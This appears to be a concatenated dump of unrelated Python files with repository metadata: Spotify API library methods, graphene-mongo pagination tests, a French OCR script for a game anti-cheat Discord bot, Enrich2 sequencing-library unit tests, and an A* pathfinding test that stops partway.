return await self.api_request_handler.make_request('GET', URLS.LIBRARY.ALBUMS, kwargs, auth_token)
async def get_shows(self, auth_token: SpotifyAuthorisationToken = None, **kwargs) -> dict:
"""
        Get User's Saved Shows
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-shows/](https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-shows/)
Args:
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.SHOWS, kwargs, auth_token)
async def get_tracks(self, auth_token: SpotifyAuthorisationToken = None, **kwargs) -> dict:
"""
        Get User's Saved Tracks
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-tracks/](https://developer.spotify.com/documentation/web-api/reference/library/get-users-saved-tracks/)
Args:
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
return await self.api_request_handler.make_request('GET', URLS.LIBRARY.TRACKS, kwargs, auth_token)
async def remove_albums(self, album_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Remove Albums for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/remove-albums-user/](https://developer.spotify.com/documentation/web-api/reference/library/remove-albums-user/)
Args:
album_id_list: The ids of the albums
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('DELETE', URLS.LIBRARY.ALBUMS,
{'ids': album_id_list}, auth_token)
async def remove_shows(self, show_id_list: List[str], auth_token: SpotifyAuthorisationToken = None,
**kwargs) -> None:
"""
Remove Shows for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/remove-shows-user/](https://developer.spotify.com/documentation/web-api/reference/library/remove-shows-user/)
Args:
show_id_list: The ids of the shows
auth_token: The auth token if you set the api class not to keep the token in memory
kwargs: Optional arguments as keyword args
"""
await self.api_request_handler.make_request('DELETE', URLS.LIBRARY.SHOWS,
{**{'ids': show_id_list}, **kwargs}, auth_token)
async def remove_tracks(self, track_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
Remove Tracks for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/remove-tracks-user/](https://developer.spotify.com/documentation/web-api/reference/library/remove-tracks-user/)
Args:
track_id_list: The ids of the tracks
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('DELETE', URLS.LIBRARY.TRACKS,
{'ids': track_id_list}, auth_token)
async def add_album(self, album_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
        Save Albums for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/save-albums-user/](https://developer.spotify.com/documentation/web-api/reference/library/save-albums-user/)
Args:
album_id_list: The ids of the albums
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('PUT', URLS.LIBRARY.ALBUMS,
                                                    {'ids': album_id_list}, auth_token)
async def add_shows(self, show_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
        Save Shows for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/save-shows-user/](https://developer.spotify.com/documentation/web-api/reference/library/save-shows-user/)
Args:
show_id_list: The ids of the shows
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('PUT', URLS.LIBRARY.SHOWS,
                                                    {'ids': show_id_list}, auth_token)
async def add_tracks(self, track_id_list: List[str], auth_token: SpotifyAuthorisationToken = None) -> None:
"""
        Save Tracks for Current User
Notes:
[https://developer.spotify.com/documentation/web-api/reference/library/save-tracks-user/](https://developer.spotify.com/documentation/web-api/reference/library/save-tracks-user/)
Args:
track_id_list: The ids of the tracks
auth_token: The auth token if you set the api class not to keep the token in memory
"""
await self.api_request_handler.make_request('PUT', URLS.LIBRARY.TRACKS,
                                                    {'ids': track_id_list}, auth_token)
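Every method in this class delegates to `api_request_handler.make_request` with an HTTP verb, a URL constant, and a params dict. A runnable stub illustrating that call shape — the fake handler and library below are stand-ins, not the real AsyncSpotify classes:

```python
import asyncio

class FakeRequestHandler:
    async def make_request(self, method, url, params, auth_token=None):
        # echo the request instead of hitting the Spotify API
        return {"method": method, "url": url, "params": params}

class FakeLibrary:
    api_request_handler = FakeRequestHandler()

    async def contains_albums(self, album_id_list, auth_token=None):
        return await self.api_request_handler.make_request(
            'GET', 'library/contains_album', {'ids': album_id_list}, auth_token)

result = asyncio.run(FakeLibrary().contains_albums(['abc', 'def']))
# result["params"] == {'ids': ['abc', 'def']}
```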
c133b28035312d1780de9ac6c3250febd4e875c6 | 1,360 | py | Python | tests/test_params.py | stratosgear/graphene-mongo | eadad34784a631cb93d6a9ba2f07f9801a94d8ac | ["MIT"] | from graphene_mongo import MongoSchema
def test_skip_parameter(schema_builder, mock_person):
""" without operator we consider that is a string with an id """
persons = [mock_person(name=str(i)) for i in range(10)]
for p in persons:
p.save()
PersonSchemaList = MongoSchema(mock_person)
schema = schema_builder([(PersonSchemaList, PersonSchemaList.list)])
result = schema.execute(""" query testQuery {
person(skip: 5) {
name
}
}""")
assert isinstance(result.data['person'], list)
assert len(result.data['person']) == 5
for i, person in enumerate(result.data['person']):
assert person['name'] == persons[i+5].name
def test_limit_parameter(schema_builder, mock_person):
""" without operator we consider that is a string with an id """
persons = [mock_person(name=str(i)) for i in range(10)]
for p in persons:
p.save()
PersonSchemaList = MongoSchema(mock_person)
schema = schema_builder([(PersonSchemaList, PersonSchemaList.list)])
result = schema.execute(""" query testQuery {
person(limit: 5) {
name
}
}""")
assert isinstance(result.data['person'], list)
assert len(result.data['person']) == 5
for i, person in enumerate(result.data['person']):
        assert person['name'] == persons[i].name
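The two tests above assert standard pagination semantics: `skip` drops the first N documents, `limit` caps the result size. A pure-Python model of that behavior — the `paginate` helper is illustrative, not part of the graphene-mongo API:

```python
def paginate(items, skip=0, limit=None):
    """Apply MongoDB-style skip/limit to a sequence."""
    end = None if limit is None else skip + limit
    return items[skip:end]

names = [str(i) for i in range(10)]
assert paginate(names, skip=5) == ['5', '6', '7', '8', '9']
assert paginate(names, limit=5) == ['0', '1', '2', '3', '4']
```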
c1447244df2aba711c0a71d525d909040f785be1 | 9,040 | py | Python | scripts/ocr.py | SH4FS0c13ty/Anti-Cheat_Discord_Bot_FR | 86c5fd67970ecdc66ba1c182205cd37208bdaf71 | ["BSD-3-Clause", "Apache-2.0", "MIT"] | 1 | 2019-08-01T08:26:05.000Z | 2019-08-01T08:26:05.000Z | import pytesseract, os, sys, traceback
import tools
from PIL import Image
import colorama
from colorama import Fore, Style
colorama.init()
def getid(file, userid):
try:
global filename
filename = file
ocr_result = ocr_core(file)
if ocr_result.find("&") != -1:
pokeid = text_process(ocr_result, userid)
elif ocr_result.find("PROGRESDELASEMAINE") != -1:
pokeid = text_processfr(ocr_result, userid, 1)
elif ocr_result.find("PROGRSDELASEMAINE") != -1:
pokeid = text_processfr(ocr_result, userid, 2)
else:
pokeid = "ERROR"
os.remove(file)
return pokeid
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
def ocr_core(filename):
try:
print("[INFO] " + "OCR en cours ...")
tools.log("[INFO] " + "OCR en cours ...")
text = pytesseract.image_to_string(Image.open(filename), lang="ita", config="-c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&")
return text
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
def text_process(text, userid):
try:
sep = "&"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lastl = list(file)[-1]
file.close()
file = open("user_ids\\" + userid + ".txt", "w")
file.write(lastl)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
file.close()
last_line = lastl
if "\n" in last_line:
sep = "\n"
last_line = last_line.split(sep, 1)[0]
else:
pass
if " " in last_line:
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
print(Fore.RED + Style.BRIGHT + "[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes." + Style.RESET_ALL)
tools.log("[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes.")
last_line = fallback(userid, 2)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(last_line)
file.close()
else:
print("[INFO] " + "Résultat de l'OCR : " + last_line)
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(last_line)
file.close()
return last_line
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
return "ERROR"
def text_processfr(text, userid, idsep):
try:
if idsep == 1:
sep = "PROGRESDELASEMAINE"
if idsep == 2:
sep = "PROGRSDELASEMAINE"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
last_line = lines[-1]
file.close()
while last_line.find("et") == -1:
lines = lines[:-1]
last_line = lines[-1]
lines = lines[:-1]
last_line = lines[-1]
if last_line != "":
pass
else:
lines = lines[:-1]
last_line = lines[-1]
if " " in last_line:
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
print(Fore.RED + Style.BRIGHT + "[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes." + Style.RESET_ALL)
tools.log("[WARN] Espace détecté dans le nom d'utilisateur. Des erreurs peuvent découler des procédures suivantes.")
last_line = fallback(userid, 1)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(last_line)
file.close()
else:
print("[INFO] " + "Résultat de l'OCR : " + last_line)
tools.log("[INFO] " + "Résultat de l'OCR : " + last_line)
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
return last_line
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
return "ERROR"
def fallback(userid, method):
try:
global filename
print("[INFO] Utilisation de la fonction de secours pour détecter le nom d'utilisateur.")
tools.log("[INFO] Utilisation de la fonction de secours pour détecter le nom d'utilisateur.")
text = os.popen("tesseract -l ita " + filename + " stdout quiet").read()
if method == 1:
sep = "PROGRÈS DE LA SEMAINE"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
last_line = lines[-1]
while last_line.find("et") == -1:
lines = lines[:-1]
last_line = lines[-1]
lines = lines[:-1]
last_line = lines[-1]
if last_line != "":
pass
else:
lines = lines[:-1]
last_line = lines[-1]
if " " in last_line:
sep = " "
rest = last_line.split(sep, 1)[0]
print("[INFO] " + "Résultat de l'OCR de secours : " + rest)
tools.log("[INFO] " + "Résultat de l'OCR de secours: " + rest)
return rest
elif method == 2:
sep = "&"
rest = text.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lastl = list(file)[-1]
file.close()
file = open("user_ids\\" + userid + ".txt", "w")
file.write(lastl)
file.close()
file = open("user_ids\\" + userid + ".txt", "r")
lines = file.read().splitlines()
file.close()
last_line = lastl
if "\n" in last_line:
sep = "\n"
last_line = last_line.split(sep, 1)[0]
else:
pass
if " " in last_line:
sep = " "
rest = last_line.split(sep, 1)[0]
file=open("user_ids\\" + userid + ".txt", "w")
file.write(rest)
file.close()
print("[INFO] " + "Résultat de l'OCR de secours: " + rest)
tools.log("[INFO] " + "Résultat de l'OCR de secours: " + rest)
return rest
else:
            print(Fore.RED + Style.BRIGHT + "[WARN] Méthode de secours incorrecte. Abandon." + Style.RESET_ALL)
            tools.log("[WARN] Méthode de secours incorrecte. Abandon.")
return "ERROR"
except KeyboardInterrupt:
return
except Exception as e:
print(Fore.RED + Style.BRIGHT + "[WARN] Une erreur inconnue est survenue. Veuillez vérifier les fichiers Anti-Cheat.log et Anti-Cheat_traceback.log pour en savoir plus." + Style.RESET_ALL)
tools.log("[ERRO] " + str(e))
tools.log_traceback(traceback.format_exc())
return "ERROR"
c17b45f05a854b5e438833745f51a9ca2d677963 | 19,227 | py | Python | countess/tests/test_lib_basic_coding.py | VariantEffect/Enrich2-py3 | 5f8534c8c9259d90d99d70e5bd9140fd0fdc8ea4 | ["BSD-3-Clause"] | 4 | 2020-01-14T19:24:07.000Z | 2020-01-16T18:11:35.000Z | import unittest
from ..libraries.basic import BasicSeqLib
from .utilities import load_config_data, create_file_path
from .methods import HDF5TestComponent
CFG_FILE = "basic_coding.json"
CFG_DIR = "data/config/basic/"
READS_DIR = create_file_path("basic/", "data/reads/")
RESULT_DIR = "data/result/basic/"
LIBTYPE = "basic"
FILE_EXT = "tsv"
FILE_SEP = "\t"
CODING_STR = "c"
# -------------------------------------------------------------------------- #
#
# INTEGRATION COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsIntegrated(unittest.TestCase):
def setUp(self):
prefix = "integrated"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
# Set all filter parameters
cfg["fastq"]["filters"]["max N"] = 0
cfg["fastq"]["filters"]["chastity"] = True
cfg["fastq"]["filters"]["avg quality"] = 38
cfg["fastq"]["filters"]["min quality"] = 20
# Set trim parameters
cfg["fastq"]["start"] = 4
cfg["fastq"]["length"] = 3
cfg["fastq"]["reverse"] = True
cfg["variants"]["wild type"]["sequence"] = "TTT"
# Set Variant parameters
cfg["variants"]["wild type"]["reference offset"] = 3
cfg["variants"]["min counts"] = 2
cfg["variants"]["max mutations"] = 1
cfg["variants"]["use aligner"] = True
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# SYNONYMOUS COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsSynonymous(unittest.TestCase):
def setUp(self):
prefix = "synonymous"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# SINGLE MUTATION COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsSingleMutation(unittest.TestCase):
def setUp(self):
prefix = "single_mut"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# MULTIMUTATION COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsMultiMutation(unittest.TestCase):
def setUp(self):
prefix = "multi_mut"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# WILDTYPE COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWildType(unittest.TestCase):
def setUp(self):
prefix = "wildtype"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ MAXN FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithMaxNFQFilter(unittest.TestCase):
def setUp(self):
prefix = "filter_maxn"
cfg = load_config_data(CFG_FILE, CFG_DIR)
cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
cfg["fastq"]["filters"]["max N"] = 0
self.test_component = HDF5TestComponent(
store_constructor=BasicSeqLib,
cfg=cfg,
result_dir=RESULT_DIR,
file_ext=FILE_EXT,
file_sep=FILE_SEP,
save=False,
verbose=False,
libtype=prefix,
scoring_method="",
logr_method="",
coding="coding",
)
self.test_component.setUp()
def tearDown(self):
self.test_component.tearDown()
def test_all_hdf5_dataframes(self):
self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ CHASTE FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithChaste(unittest.TestCase):
    def setUp(self):
        prefix = "filter_chastity"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["fastq"]["filters"]["chastity"] = True
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ MIN QUAL FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithMinQualFQFilter(unittest.TestCase):
    def setUp(self):
        prefix = "filter_minq"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["fastq"]["filters"]["min quality"] = 20
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ AVG QUAL FILTER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithAvgQualFQFilter(unittest.TestCase):
    def setUp(self):
        prefix = "filter_avgq"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["fastq"]["filters"]["avg quality"] = 38
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ TRIM LENGTH COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsTrimLengthSetting(unittest.TestCase):
    def setUp(self):
        prefix = "trim_len"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["fastq"]["length"] = 3
        cfg["variants"]["wild type"]["sequence"] = "AAA"
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ TRIM START COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsTrimStartSetting(unittest.TestCase):
    def setUp(self):
        prefix = "trim_start"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["fastq"]["start"] = 4
        cfg["variants"]["wild type"]["sequence"] = "AAA"
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# FASTQ REVERSE COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsReverseSetting(unittest.TestCase):
    def setUp(self):
        prefix = "revcomp"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["fastq"]["reverse"] = True
        cfg["variants"]["wild type"]["sequence"] = "TTTTTT"
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT WT-OFFSET COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithRefOffset(unittest.TestCase):
    def setUp(self):
        prefix = "reference_offset"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["variants"]["wild type"]["reference offset"] = 6
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT MIN COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithVariantMinCount(unittest.TestCase):
    def setUp(self):
        prefix = "variant_mincounts"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["variants"]["min counts"] = 2
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT MAX MUTATIONS COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithVariantMaxMutations(unittest.TestCase):
    def setUp(self):
        prefix = "variant_maxmutations"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["variants"]["max mutations"] = 1
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# VARIANT ALIGNER COUNT TESTING
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsWithVariantAligner(unittest.TestCase):
    def setUp(self):
        prefix = "use_aligner"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["fastq"]["reads"] = "{}/{}.fq".format(READS_DIR, prefix)
        cfg["variants"]["use aligner"] = True
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# COUNTS ONLY MODE
#
# -------------------------------------------------------------------------- #
class TestBasicSeqLibCountsOnlyMode(unittest.TestCase):
    def setUp(self):
        prefix = "counts_only"
        cfg = load_config_data(CFG_FILE, CFG_DIR)
        cfg["counts file"] = "{}/{}.tsv".format(READS_DIR, prefix)
        self.test_component = HDF5TestComponent(
            store_constructor=BasicSeqLib,
            cfg=cfg,
            result_dir=RESULT_DIR,
            file_ext=FILE_EXT,
            file_sep=FILE_SEP,
            save=False,
            verbose=False,
            libtype=prefix,
            scoring_method="",
            logr_method="",
            coding="coding",
        )
        self.test_component.setUp()

    def tearDown(self):
        self.test_component.tearDown()

    def test_all_hdf5_dataframes(self):
        self.test_component.runTest()
# -------------------------------------------------------------------------- #
#
# MAIN
#
# -------------------------------------------------------------------------- #
if __name__ == "__main__":
    unittest.main()
# aoc/test_astar.py (Godsmith/adventofcode, Unlicense)
from aoc.astar import astar

def test_astar():
    maze = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
    start = (0, 0)
    end = (7, 6)
    path = astar(maze, start, end)
    assert path == [(0, 0), (1, 1), (2, 2), (3, 3), (3, 4), (4, 5), (5, 6), (6, 6), (7, 6)]


def test_other_adjacent():
    maze = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
    start = (0, 0)
    end = (7, 6)
